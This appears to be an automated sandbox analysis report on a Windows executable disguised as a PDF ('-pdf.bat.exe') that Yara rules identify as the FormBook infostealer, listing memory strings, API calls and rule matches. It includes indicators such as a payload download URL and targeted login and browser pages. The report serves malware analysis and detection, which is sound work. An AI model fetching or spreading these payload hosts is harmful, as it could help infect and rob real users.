        Source: -pdf.bat.exe, 00000002.00000001.37862054479.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.00000000005F2000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: ipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fredy.ee/
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fredy.ee/tur.bin
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fredy.ee/tur.bint
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: ipconfig.exe, 00000004.00000003.38580690753.0000000003642000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38584047813.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38580912535.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.000000000365E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: ipconfig.exe, 00000004.00000003.38580690753.0000000003642000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38584047813.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38580912535.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.000000000365E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: ipconfig.exe, 00000004.00000003.38580690753.0000000003642000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38584047813.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38580912535.000000000365E000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.000000000365E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: -pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: ipconfig.exe, 00000004.00000003.38580790536.000000000362C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
        Source: ipconfig.exe, 00000004.00000003.38580790536.000000000362C000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42206145424.0000000003623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
        Source: ipconfig.exe, 00000004.00000003.38579786357.000000000851B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
        Source: ipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: ipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: ipconfig.exe, 00000004.00000003.38585730075.000000000853B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: ipconfig.exe, 00000004.00000003.38589208982.00000000085A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.0000000004CA0000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.0000000004F60000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownHTTPS traffic detected: 185.86.211.136:443 -> 192.168.11.20:49728 version: TLS 1.2
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00404C33 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404C33

        E-Banking Fraud

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326634E0 NtCreateMutant,LdrInitializeThunk,2_2_326634E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662B90 NtFreeVirtualMemory,LdrInitializeThunk,2_2_32662B90
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662D10 NtQuerySystemInformation,LdrInitializeThunk,2_2_32662D10
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32664260 NtSetContextThread,2_2_32664260
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32664570 NtSuspendThread,2_2_32664570
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662A10 NtWriteFile,2_2_32662A10
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662AC0 NtEnumerateValueKey,2_2_32662AC0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662AA0 NtQueryInformationFile,2_2_32662AA0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662A80 NtClose,2_2_32662A80
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662B20 NtQueryInformationProcess,2_2_32662B20
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662B00 NtQueryValueKey,2_2_32662B00
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662B10 NtAllocateVirtualMemory,2_2_32662B10
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662BE0 NtQueryVirtualMemory,2_2_32662BE0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662BC0 NtQueryInformationToken,2_2_32662BC0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662B80 NtCreateKey,2_2_32662B80
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326638D0 NtGetContextThread,2_2_326638D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326629F0 NtReadFile,2_2_326629F0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326629D0 NtWaitForSingleObject,2_2_326629D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32662E50 NtCreateSection,2_2_32662E50
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00403804 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,0_2_00403804
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_004045210_2_00404521
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_004072350_2_00407235
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_703123510_2_70312351
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264D2102_2_3264D210
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261D2EC2_2_3261D2EC
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EF3302_2_326EF330
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263E3102_2_3263E310
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326213802_2_32621380
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E70F12_2_326E70F1
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B0D02_2_3263B0D0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326200A02_2_326200A0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CD1302_2_326CD130
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326F010E2_2_326F010E
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3261F1132_2_3261F113
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326351C02_2_326351C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326546702_2_32654670
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326DD6462_2_326DD646
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263B6502_2_3263B650
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326CD62C2_2_326CD62C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264C6002_2_3264C600
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262C6E02_2_3262C6E0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EF6F62_2_326EF6F6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EA6C02_2_326EA6C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326306802_2_32630680
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326327602_2_32632760
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263A7602_2_3263A760
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E67572_2_326E6757
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EE7092_2_326EE709
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262170C2_2_3262170C
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326304452_2_32630445
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EF5C92_2_326EF5C9
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E75C62_2_326E75C6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EEA5B2_2_326EEA5B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326ECA132_2_326ECA13
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EFA892_2_326EFA89
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32649B402_2_32649B40
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EFB2E2_2_326EFB2E
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32630B102_2_32630B10
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3263EB802_2_3263EB80
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326168682_2_32616868
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3264B8702_2_3264B870
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EF8722_2_326EF872
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326D08352_2_326D0835
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326338002_2_32633800
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326E78F32_2_326E78F3
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326328C02_2_326328C0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326468822_2_32646882
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_3262E9A02_2_3262E9A0
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326EE9A62_2_326EE9A6
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_326D0E6D2_2_326D0E6D
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 2_2_32650E502_2_32650E50
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103E10B3_2_0103E10B
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103796B3_2_0103796B
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_010359EB3_2_010359EB
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103C85B3_2_0103C85B
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_01035B2F3_2_01035B2F
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_010565DB3_2_010565DB
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103FF3B3_2_0103FF3B
        Source: C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exeCode function: 3_2_0103774B3_2_0103774B
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: String function: 32677BE4 appears 58 times
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: String function: 3261B910 appears 168 times
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: String function: 326AEF10 appears 60 times
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: String function: 3269E692 appears 43 times
        Source: -pdf.bat.exe, 00000000.00000000.37678685942.0000000000490000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesloffens.exeDVarFileInfo$ vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000002.38153091093.00000000328C0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000003.38051427415.00000000323BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000003.38054661347.0000000032574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000003.38109319687.00000000024EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000000.37860102631.0000000000490000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesloffens.exeDVarFileInfo$ vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs -pdf.bat.exe
        Source: -pdf.bat.exe, 00000002.00000003.38109262799.0000000002539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs -pdf.bat.exe
        Source: -pdf.bat.exeBinary or memory string: OriginalFilenamesloffens.exeDVarFileInfo$ vs -pdf.bat.exe
        Source: -pdf.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 00000002.00000002.38153009509.00000000322E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.42207281231.0000000003880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.42206068173.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.42753648495.0000000001020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.38153921691.0000000032940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000003.00000002.42754818639.0000000002C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/7@18/12
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00403804 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,0_2_00403804
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_00404188 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,LdrInitializeThunk,SetDlgItemTextW,EnableWindow,0_2_00404188
        Source: C:\Users\user\Desktop\-pdf.bat.exeCode function: 0_2_0040234F LdrInitializeThunk,LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_0040234F
